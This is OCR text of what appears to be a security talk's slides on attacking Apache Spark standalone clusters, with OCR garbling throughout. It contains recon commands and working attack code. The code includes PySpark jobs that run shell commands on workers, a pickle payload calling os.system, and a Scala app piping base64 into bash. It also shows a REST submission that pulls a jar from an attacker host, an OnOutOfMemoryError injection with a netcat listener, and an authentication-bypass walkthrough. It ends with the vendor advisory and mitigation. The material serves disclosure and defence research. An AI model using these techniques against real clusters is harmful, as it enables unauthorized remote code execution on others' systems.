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Apache Hadoop Framework 


e.g. Word count 


import java.io.IOException; 
import java.util.StringTokenizer; 


import org.apache.hadoop.conf.Configuration; 

import org.apache.hadoop.fs.Path; 

import org.apache.hadoop.io.IntWritable; 

import org.apache.hadoop.io.Text; 

import org.apache.hadoop.mapreduce.Job; 

import org.apache.hadoop.mapreduce.Mapper; 

import org.apache.hadoop.mapreduce.Reducer; 

import org.apache.hadoop.mapreduce.lib.input.FileInputFormat; 
import org.apache.hadoop.mapreduce.lib.output.FileOutputFormat; 


public class WordCount {


public static class TokenizerMapper 
extends Mapper<Object, Text, Text, IntWritable>{ 


private final static IntWritable one = new IntWritable(1); 
private Text word = new Text();


public void map(Object key, Text value, Context context 
) throws IOException, InterruptedException { 
StringTokenizer itr = new StringTokenizer(value.toString());
while (itr.hasMoreTokens()) { 
word.set(itr.nextToken()); 
context.write(word, one); 


} 


e.g. Word count 


public static class IntSumReducer 
extends Reducer<Text,IntWritable,Text,IntWritable> { 
private IntWritable result = new IntWritable(); 


public void reduce(Text key, Iterable<IntWritable> values, 
Context context 
) throws IOException, InterruptedException { 
int sum = 0;
for (IntWritable val : values) { 
sum += val.get(); 


result.set(sum); 
context.write(key, result); 


} 
} 


public static void main(String[] args) throws Exception { 
Configuration conf = new Configuration(); 
Job job = Job.getInstance(conf, "word count"); 
job.setJarByClass(WordCount.class); 
job.setMapperClass(TokenizerMapper.class);
job.setCombinerClass (IntSumReducer.class); 
job.setReducerClass (IntSumReducer.class); 
job.setOutputKeyClass(Text.class); 
job.setOutputValueClass(IntWritable.class); 
FileInputFormat.addInputPath(job, new Path(args[0])); 
FileOutputFormat.setOutputPath(job, new Path(args[1])); 
System.exit(job.waitForCompletion(true) ? 0 : 1);
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park 


import org.apache.spark.{SparkContext, SparkConf} 


val sc = new SparkContext(new SparkConf()) 

val textFile = sc.textFile("hdfs://...") 

val counts = textFile.flatMap(line => line.split(" ")) 
.map(word => (word, 1))
.reduceByKey(_ + _) 

counts.saveAsTextFile("hdfs://...") 
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Security in Spark is OFF by default. 
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How does it work? 


3xn Executors 


Worker 1 


Spark RPC 


APACHE 


Worker 2 
Cluster 


Manager Egg 
RPC/7077 . 


HTTP/8081 
RPC/<rand> 


HTTP/8080 


Spark Master UI: 8080 


ik ,,, Spark Master at spark://192.168.1.24:7077 
URL: spark://192.168.1.24:7077 

Alive Workers: 2 

Cores in use: 2 Total, 2 Used 

Memory in use: 5.7 GB Total, 2.0 GB Used 

Applications: 1 Running, 0 Completed 

Drivers: 0 Running, 0 Completed

Status: ALIVE 


Spa 


4.3 


v Workers (3) 
Worker Id Address 
worker-20200207221005-192.168.1.29-37330 192.168.1.29:37330 
worker-20200207221415-192.168.1.29-37292 192.168.1.29:37292 
worker-20200207221756-192.168.1.36-37963 192.168.1.36:37963 


v Running Applications (1) 


Cores 

1 (0 Used) 
1 (1 Used) 
1 (1 Used) 


Application ID Name Cores Memory per Executor Submitted Time 


app-20200207222458-0000 (kill) Score Job 2 1024.0 MB 2020/02/07 22:24:58 


Memory 

2.9 GB (0.0 B Used) 

2.9 GB (1024.0 MB Used) 
2.9 GB (1024.0 MB Used) 


User State 


lambda RUNNING 


Client mode: 3xn Executors 


Driver is running on your laptop 


Worker 1 


Spark RPC 


Da | Worker 2 
Manager RPC/<rand> 


HTTP/4040 RPC/7077 E 
RPC/<rand> HTTP/8080 
RPC/<rand> 


Recon 


> spark aws ec2 describe-instances \
--filter 'Name=tag:Name,Values=*spark*master*' \
--query 'Reservations[].Instances[].PrivateIpAddress'


[
"172.31.29.239",
"172.31.26.231",
"172.31.16.251"
]
> spark 


> spark kubectl get pods -o="custom-columns=\
POD:.metadata.name,\
PODIP:.status.podIP" | grep "*spark*master"


POD IP 
spark-master-6855784c-f438k 172.18.0.5 


root@attack:~# nmap -A -sV 192.168.1.24 -p 7077 --open 

Starting Nmap 7.88 ( https://nmap.org ) at 2020-02-08 10:21 CET 

Stats: 0:00:27 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 0.00% done 

Nmap scan report for (192.168.1.24) 

Host is up (0.00030s latency). 


PORT STATE SERVICE VERSION 
7077/tcp open unknown 


200000B5 72 69 6e 67 3b 78 70 74 OO 06 Ac 
00000000 00 00 00 00 00 00 OO 


00000010 2e 00 00 00 2f 
00000015 ac ed 00 05 73 72 00 11 6a 61 76 61 2e 6c 61 6e ....sr.. java.lan
00000025 67 2e 42 6f 6f 6c 65 61 6e cd 20 72 80 d5 9c fa g.Boolea n. r....


= 
Driver 
Manager 


00 00 00 00 00 00 00 C3 05 de ad be ef de ad be ef 
00 00 00 0 


00000010 2e 00 00 00 2f 
00000015 ac ed 00 05 73 72 00 11 6a 61 76 61 2e 6c 61 6e ....sr.. java.lan
00000025 67 2e 42 6f 6f 6c 65 61 6e cd 20 72 80 d5 9c fa g.Boolea n. r....


Spark/core/src/main/scala/org/apache/spark/rpc/netty/RpcEndpointVerifier.scala 
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00000000 00 OO 00 00 00 00 00 44 04 6۲ f6 cf 3a 47 11 e3 … … 
00000010 2e 00 00 00 2f 

00000015 ac ed 00 05 73 72 00 11 6a 61 76 61 2e 6c 61 6e ....sr.. java.lan
00000025 67 2e 42 6f 6f 6c 65 61 6e cd 20 72 80 d5 9c fa g.Boolea n. r....


Driver 
Manager 


00 00 00 00 00 00 00 C3 05 de ad be ef de ad be ef 
00 00 00 0 


Serialized(CheckExistence(name="master")) 
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6f f6 cf 3a 4711 e3 


00000010 2e 00 00 00 2f
00000015 ac ed 00 05 73 72 00 11 6a 61 76 61 2e 6c 61 6e ....sr.. java.lan
00000025 67 2e 42 6f 6f 6c 65 61 6e cd 20 72 80 d5 9c fa g.Boolea n. r....


janage 
Driver 
Manager 


00 00 00 00 00 00 00 C3 05 6f f6 cf 3a 47 11 e3 2e
00 00 00 b0


ees 


Serialized(CheckExistence(name="master")) 


سح 


00 00 00 00 00 00 00 44 04 6f f6 cf 3a 47 11 e3 2e
00 00 00 2f 
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20000C 2 69! 3b 7 JA 00064d617374 6572 ring;xpt „Master 
“00000000 00 00 00 00 00 00 00 44 04 6f f6 "T 3a 47 11 e3 = 
00000010 2e 00 00 00 2f wd 
00000015 ac ed 00 05 73 72 00 11 6a 61 76 61 2e 6c 61 Oe 
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Driver 
Manager 


00 00 00 00 00 00 00 C3 05 6f f6 cf 3a 47 11 e3 2e
00 00 00 b0


es 


Serialized(CheckExistence(name="master")) 


cec 


00 00 00 00 00 00 00 44 04 6f f6 cf 3a 47 11 e3 2e 
00 00 00 2f 


ccc 


Serialized(Java.lang.Boolean()) 


root@attack:~# m 


Our first attempt at code exec 


from pyspark import SparkContext, SparkConf 


conf = SparkConf() 

conf = conf.setAppName("Wordcount" ) 

conf = conf.setMaster("spark://192.168.1.37:7077") 
conf = conf.set("spark.driver.host", "192.168.1.22") 


sc = SparkContext(conf=conf) 


from subprocess import Popen, PIPE 
print(Popen(["id"], stdout=PIPE).stdout.read()) 


> code python poc.py 

20/02/08 14:58:37 WARN NativeCodeLoader: Unable to load native-hadoop library for your platf: 
Using Spark's default log4j profile: org/apache/spark/log4j-defaults.properties 

Setting default log level to "WARN". 

To adjust logging level use sc.setLogLevel(newLevel). For SparkR, use setLogLevel(newLevel). 


uid=1000(ayoul3) gid=1000(ayoul3) groups=1000(ayoul3),4(adm),20(dialout),24(cdrom),25(floppy
8(lxd),114(netdev) 


> code 
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Spark APIs 


open("input.txt", "r") 


input = sc.textFile("input.txt") — 


input 


input = [1, 2, 3, 4, 5] 


EN [1.2.3] 
input = sc.parallelize([1, 2, 3, 4, 5])


Resilient Distributed Datasets (RDD) 


Transformations 


input = sc.parallelize([1, 2, 3, 5, 4]) 


def multiply(x): | 
return x*20 C computed yet! 


res = input.map(multiply) ۳۳ ze, 40, se 
22 (eo, 100) 


Nothing gets sent to the workers just yet 


Directed Acyclic Graph (DAG) 


parallelize 


filterMap 


Collect => Graph sent to the executors 


Worker 1 


Partition 1 


Driver 


Partition 2 


Worker 1 


Driver 


Worker 2 


Partition 1: 
[20 40 60] | Worker 1 


Driver 


[20, 40, 60, 80, 100] Partition 2: | Worker 2 


[80, 100] 


from pyspark import SparkContext, SparkConf 
from subprocess import Popen, PIPE 


conf = SparkConf() 

conf = conf.setAppName("Wordcount" ) 

conf = conf.setMaster("spark://192.168.1.37:7077") 
conf = conf.set("spark.driver.host", "192.168.1.22") 
sc = SparkContext(conf=conf) 


input = sc.parallelize([1, 2, 3, 4, 5]) 
res = input.map(lambda x: Popen(["id"], stdout=PIPE).stdout.read()) 


for a in res.collect(): 
print(a) 


> sparky git:(master) > 


ubuntu@ip-172-31-29-239:»/sparky$ „ 


> sparky git:(master) > 


version = utf8_deserializer.loads(infile)
if version != "%d.%d" % sys.version_info[:2]:
    raise Exception(("Python in worker has different version %s than th
                     "driver %s, PySpark cannot run with different mino
                     "Please check environment variables PYSPARK_PYTHON
                     "PYSPARK_DRIVER_PYTHON are correctly set.") %
                    ("%d.%d" % sys.version_info[:2], version))


Python version on driver == Python version on executors 


File "/opt/spark/python/lib/pyspark.zip/pyspark/worker.py", line 267, in main 
("%d.%d" % sys.version_info[:2], version))


Exception: Python in worker has different version 3.5 than that in driver 3.7, PySpark can


versions.Please check environment variables PYSPARK_PYTHON and PYSPARK_DRIVER_PYTHON are


at org.apache.spark.api.python.BasePythonRunner$ReaderIterator.handlePythonExcept: 
at org.apache.spark.api.python.PythonRunner$$anon$1.read(PythonRunner.scala:588) 
at org.apache.spark.api.python.PythonRunner$$anon$1.read(PythonRunner.scala:571) 
at org.apache.spark.api.python.BasePythonRunner$ReaderIterator.hasNext(PythonRunni


import sys, collections, os 


myver = collections.namedtuple("myver", "major, minor, micro, releaselevel, serial") 


sys.version_info = myver(major=3, minor=5, micro=0, releaselevel="final", serial=0)


sc = SparkContext(conf=conf) 


input = sc.parallelize([1, 2, 3, 4, 5]) 
res = input.map(lambda:..) 
res.Collect().. 


import sys, collections, os 


myver = collections.namedtuple("myver", "major, minor, micro, releaselevel, serial") 


sys.version_info = myver(major=3, minor=5, micro=0, releaselevel="final", serial=0)


class hey(object):
    def __reduce__(self):
        return (os.system, ("echo Pwned > /tmp/out.txt",))


    def multiplyMe(self, x):
        return x * 20


res = input.map(hey().multiplyMe) 


» code spark@worker3:~$ m 
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Driver 


Register Application 


RPC/7077 


Assign workers, 
reports application status, etc. 


RPC/<Scheduler Port>


RPC/<BlockManager Port>


Assign to apps, driver 
info, heartbeat, etc. 


Register executor 


Retrieve data blocks 


Option 1: using the right ports 


conf = SparkConf()
conf = conf.setAppName( "Wordcount" ) 
conf = conf.set("spark.driver.port", 8080) 
conf = conf.set("spark.blockManager.port", 8443) 


Option 2: cluster mode 


Worker 1 


Spark RPC 


APACHE 


Worker 2 


Cluster 


Manager 


RPC/7077 Worker n 


We only need access to port 7077! 


object SimpleApp { 
def makeInt(s: String): Try[Int] = Try(s.trim.toInt) 
… Snip … 


def executeOnSpark(cmd: String, numTasks: Int) ={ 
val sc = new SparkContext(new SparkConf()) 
val myList = sc.parallelize(List.range(0, numTasks), numTasks)
val output = myList.map( x => (s"echo -ne $cmd" | "base64 -d" | "bash")!!) 
output.collect().zipWithIndex.foreach( case (e, i) => println(s"[+] worker $i\n$e\n====== 


w SIE: au 
def main(args: Array[String]) { 
val numTasks = (args.lift(1) match {
case Some(x:String) => (makeInt(x) match{ 
case Success(x) => x 
case _ => 1 


case _ => 1 


executeOnSpark(args(0), numTasks) 


} 


> res git:(master) > ls 
simpleApp.jar 


daemons and applications, so this deployment configuration is not as secure as the above, especially 


configuration, a user with the secret can effectively impersonate any other user. 


The Rest Submission Server and the MesosClusterDispatcher do not support authentication. You sho 
REST API & MesosClusterDispatcher (port 6066 and 7077 respectively by default) are restricted to ho


?status=[active|complete|pending|failed] list only stages in the state. 


Endpoint Meaning 


/applications A list of all applications. 
?status=[completed|running] list only applications in the chosen state.
?minDate=[date] earliest date/time to list.
Examples:
?minDate=2015-02-10
?minDate=2015-02-03T16:42:40.000GMT
?maxDate=[date] latest date/time to list; uses same format as minDate.
?limit=[limit] limits the number of applications listed.


/applications/[app-id]/jobs A list of all jobs for a given application. 
?status=[running|succeeded|failed|unknown] list only jobs in the 


specific state. 
/applications/[app-id]/jobs/[job-id] Details for the given job. 


/applications/[app-id]/stages A list of all stages for a given application. 


private def buildDriverDescription(request: CreateSubmissionRequest): DriverDescription = { 
// Required fields, including the main class because python is not yet supported 


val appResource = Option(request.appResource).getOrElse { 


throw new SubmitRestMissingFieldException( "Application jar is missing.") 


val mainClass = Option(request.mainClass).getOrElse {


throw new SubmitRestMissingFieldException("Main class is missing.") 


// Optional fields 

val sparkProperties = request.sparkProperties

val driverMemory = sparkProperties.get(config.DRIVER_MEMORY.key)

val driverCores = sparkProperties.get(config.DRIVER_CORES.key)

val driverDefaultJavaOptions = sparkProperties.get(SparkLauncher.DRIVER_DEFAULT_JAVA_OPTIONS)
val driverExtraJavaOptions = sparkProperties.get(config.DRIVER_JAVA_OPTIONS.key)

val driverExtraClassPath = sparkProperties.get(config.DRIVER_CLASS_PATH.key)

val driverExtraLibraryPath = sparkProperties.get(config.DRIVER_LIBRARY_PATH.key)

val superviseDriver = sparkProperties.get(config.DRIVER_SUPERVISE.key)


POST http://192.168.1.96:6066/v1/submissions/create 


{
  "action": "CreateSubmissionRequest",
  "appResource": "http://192.168.1.22:9090/simpleApp.jar",
  "mainClass": "SimpleApp",
  "appArgs": [
    "ZWNobyBwd25lZCA+IC90bXAvb3V0LnR4dA=="
  ],
  "clientSparkVersion": "2.4.3",
  "environmentVariables": {
    "SPARK_ENV_LOADED": "1"
  },
  "sparkProperties": {
    "spark.master": "spark://192.168.1.96:7077",
    "spark.driver.supervise": "false",
    "spark.app.name": "Word Count",
    "spark.submit.deployMode": "cluster",
    "spark.jars": "http://192.168.1.22:9090/simpleApp.jar"


> res git:(master) m 


curl -X POST http://spark-cluster-ip:6066/v1/submissions/create --header "Content-Type:application/json;charset=UTF-8" --data '{
"CreateSubmissionRequest", 
"appArgs" : [ "myAppArgument1" ], 
"appResource" : "file:/myfilepath/spark-job-1.0.jar", 
"clientSparkVersion" : "1.5.0", 
"environmentVariables" : { 


"SPARK ENV LOADED" : "1" 


"mainClass" : "com.mycompany.MyJob", 
"sparkProperties" : ( 
^nk.jars" : "file:/myfilepath/spark-job-1.0.jar", 


<.driver.supervise 
jark.app.name" 


<.eventLog.enabled": "true", 


<. submit.deployMode" : "cluster", 


c.master” : "spark://spark-cluster-ip:6066" 


https://gist.github.com/arturmkrtchyan/5d8559b2911ac951d34a 


AFF 


Zil NERA FEI SED REST DMB, XML CEST, 


提交方式有两种：


1. 利用 REST API
2. 利用 submissions 网关（集成在 7077 端口中）


应用可以是 Java 或 Python，就是一个最简单的类，如（参考链接 1）：


java.io.BufferedReader; 
java.io.InputStreamReader; 


Exploit { 


https://github.com/vulhub/vulhub/tree/master/spark/unacc 


Apache Spark Unauthenticated Command Execution 


Disclosed Created 


12/12/2017 03/19/2019 


Description 


This module exploits an unauthenticated command execution vulnerability in Apache Spark with standalone 
cluster mode through REST API. It uses the function CreateSubmissionRequest to submit a malious java class 


and trigger it. 


Author(s) 


Fengwei Zhang 

Imran Rashid 

aRe00t 

Green-m <greenm.xxoo@gmail.com> 


exploit/linux/http/spark_unauth_rce 


Authentication 


# /opt/spark/conf/spark-defaults.conf 


spark.authenticate = true 
spark.authenticate.secret = BBBBBBB 


point tV E rifie ER rS( ( | mae kE 5 XIS t Inis L.. (OD joans 
java.lang.IllegalStateException:
Expected SaslMessage, received something else (maybe your client does not have SASL
enabled?) 
at org.apache.spark.network.sasl.SaslMessage.decode(SaslMessage.java:69) 
at org.apache.spark.network.sasl.SaslRpcHandler.receive(SaslRpcHandler.java: 


90) 

at
org.apache.spark.network.server.TransportRequestHandler.processRpcRequest(Trans
portRequestHandler.java:180)

at
org.apache.spark.network.server.TransportRequestHandler.handle(TransportRequest
Handler.java:103)

at
org.apache.spark.network.server.TransportChannelHandler.channelRead(TransportCh
annelHandler.java:118)


at 


Cluster 
Driver 
Manager 


00 00 00 00 00 00 00 2B 03 de ad be ef de ad be ef 
00 00 00 b0 [...] SparkSaslUser


00 00 00 00 00 00 00 af 04 


nonce = "eerererer" 
realm="default" 
qop="auth-conf"
cipher="des, 3des, rc4" 
algorithm="md5-sess" 


Half_A1 = md5(b64 username, :, realm, : ,b64 secret) 
A1 = md5(Half_A1, :, srvNonce, :, cliNonce) 


A2 = md5("AUTHENTICATE:null/default")
Response = md5(A1, :, srvNonce, :00000001:, cliNonce, ":auth:", A2)


Described in RFC 2831 


Cluster 
Driver 
Manager 


00 00 00 00 00 00 00 2B 03 de ad be ef de ad be ef
00 00 00 b0 [...] SparkSaslUser


00 00 00 00 00 00 00 af 04 


realm="default" 

nonce = "eerererer" 
qop="auth-conf" 
cipher="des, 3des, rc4" 
algorithm="md5-sess" 


——— o o — o  —* 


realm="default", response, cnonce, etc. 


سس( 


rspauth=... 


000000EC 
000000FC 
00000101 
00000111 


00 00 00 00 00 00 44 
00 00 00 2f 

ed 00 05 73 72 00 11 
2e 42 6f 6f 6c 65 61 
02 00 01 5a 00 05 76 


04 79 f7 Of d3 58 79 61 


6a 61 76 61 2e 6c 61 6e 
6e cd 20 72 80 d5 9c fa 
61 6c 75 65 78 70 01 


Po Java La 
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Cluster 
Driver 
| Manager 
00 00 00 00 00 00 0a 14 09 00 00 0a 07
Serialized(RegisterApplication) 


00 00 00 00 00 00 04 98 09 00 00 04 8b 
Serialized(RegisteredApplication) 


Auth bypass is a sure thing 


11732 11634 81 09:51 pts/1 00:00:02 /usr/lib/jvm/java-8-openjdk-amd64/jre/bin/java
-cp /opt/spark/conf/:/opt/spark/jars/* -Xmx1024M -Dspark.driver.port
=8080 -Dspark.authenticate=true org.apache.spark.executor.CoarseGrainedExecutorBackend --driver-url
spark://CoarseGrainedScheduler@192.168.1.22:8080 --executor-id 0 --hostname 192.168.1.37 --cores 1
--app-id app-20200215095118-0005 --worker-url spark://Worker@192.168.1.37:34727


Cluster 
Driver 
| Manager 
00 00 00 00 00 00 0a 14 09 00 00 0a 07
Serialized(RegisterApplication) 


00 00 00 00 00 00 04 98 09 00 00 04 8b 
Serialized(RegisteredApplication) 


Auth bypass is a sure thing 
RCE is a definite maybe 


private[spark] case class ApplicationDescription(
name: String,
maxCores: Option[Int],
memoryPerExecutorMB: Int,
command: Command,
appUiUrl: String,
eventLogDir: Option[URI] = None,
// short name of compression codec used when writing event logs, if any (e.g. lzf)
eventLogCodec: Option[String] = None,
coresPerExecutor: Option[Int] = None,
// number of executors this application wants to start with,
// only used if dynamic allocation is enabled
initialExecutorLimit: Option[Int] = None


private[spark] case class Command(
mainClass: String,
arguments: Seq[String],
environment: Map[String, String],
classPathEntries: Seq[String],
libraryPathEntries: Seq[String],
javaOpts: Seq[String]) {


11732 11634 81 09:51 pts/1 00:00:02 /usr/lib/jvm/java-8-openjdk-amd64/jre/bin/java

-cp /opt/spark/conf/:/opt/spark/jars/* -Xmx1024M -Dspark.driver.port

=8080 -Dspark.authenticate=true org.apache.spark.executor.CoarseGrainedExecutorBackend --driver-url

spark://CoarseGrainedScheduler@192.168.1.22:8080 --executor-id 0 --hostname 192.168.1.37 --cores 1
--app-id app-20200215095118-0005 --worker-url spark://Worker@192.168.1.37:34727


You can use this Oracle HotSpot option to run commands when a java.lang.OutOfMemoryError is thrown. This opti 


recognized by OpenJ9 and provided for compatibility. 
N 


Syntax 


-XX:OnOutOfMemoryError="<command string>"


Setting Set the maximum size of the heap. 
maximum 


heap size 


conf = SparkConf() 

conf = conf.setAppName( "Wordcount") 

conf = conf.set(
"spark.executor.extraJavaOptions",
"-Xmx:1m -XX:OnOutOfMemoryError=<cmd>"


sparky git:(master) > > ~ NC -l 2222, 


“ TransportRequestHandler java X  AuthRpcHandler.java 


common > network-common > src > main > java > org > apache > spark > network > server > £: TransportReguestHandler.java > Y Transpo 


 99 @Override
100 public void handle(RequestMessage request) {
101   if (request instanceof RpcRequest) {
102     processRpcRequest((RpcRequest) request);
103   } else if (request instanceof OneWayMessage) {
104     processOneWayMessage((OneWayMessage) request);
105   } else if (request instanceof StreamRequest) {
106     processStreamRequest((StreamRequest) request);
107   } else if (request instanceof UploadStream) {
108     processStreamUpload((UploadStream) request);
109   } else {
110     throw new IllegalArgumentException("Unknown request type: " + request);
111   }
112 }


TransportRequestHandler.java X =: AuthRpcHandler.java 


common > network-common > src > main > java > org > apache > spark > network > server > ^ TransportReguestHandler.java > €2 TransportReg 


239 
240 
241 
242 
243 
244 
245 
246 
247 
248 
249 
250 
251 


252 
252 


} finally {
  req.meta.release();
}
}


private void processOneWayMessage(OneWayMessage req) {
  try {
    rpcHandler.receive(reverseClient, req.body().nioByteBuffer());
  } catch (Exception e) {
    logger.error("Error while invoking RpcHandler#receive() for one-way message.", e);
  } finally {
    req.body().release();
  }
}


& TransportRequestHandler.java ^ AuthRpcHandler.java X 


common > network-common > src > main > java > org > apache > spark > network > crypto > ^ AuthRpcHandler.java > ۶ AuthRpcHandler > © receiveStrean 


 84 public void receive(TransportClient client, ByteBuffer message, RpcResponseCallback callback) {
 85   if (doDelegate) {
 86     delegate.receive(client, message, callback);
 87     return;
 88   }
 89
 90   int position = message.position();
 91   int limit = message.limit();
 92
 93   ClientChallenge challenge;
 94   try {
 95     challenge = ClientChallenge.decodeMessage(message);
 96     LOG.debug("Received new auth challenge for client {}.", channel.remoteAddress());
 97   } catch (RuntimeException e) {
 98     if (conf.saslFallback()) {
 99       LOG.warn("Failed to parse new auth challenge, reverting to SASL for client {}.",
100         channel.remoteAddress());
101       delegate = new SaslRpcHandler(conf, channel, delegate, secretKeyHolder);
102       message.position(position);
103       message.limit(limit);
104       delegate.receive(client, message, callback);
105       doDelegate = true;
106     } else {
107       LOG.debug("Unexpected challenge message from client {}, closing channel.",


Severity: Important 
Vendor: The Apache Software Foundation 
Versions Affected: 

• Apache Spark 2.4.5 and earlier


Description: 


In Apache Spark 2.4.5 and earlier, a standalone resource manager's master may be configured to require authentication 


(spark.authenticate) via a shared secret. When enabled, however, a specially-crafted RPC to the master can succeed in starting an
application's resources on the Spark cluster, even without the shared key. This can be leveraged to execute shell commands on the host 
machine. 


This does not affect Spark clusters using other resource managers (YARN, Mesos, etc). 
Mitigation: 


• Users should update to Spark 2.4.6 or 3.0.0.
• Where possible, network access to the cluster machines should be restricted to trusted hosts only.


Credit: 


• Ayoub Elaassal


Spark is awesome! 


Too bad security is not taken seriously 


Spark is awesome! 


Too bad security is not taken seriously 


We only covered Spark Standalone mode 


上 )0 5۷0۱۱13 _ 
Ask | e github.com/ayoul3/sparky 


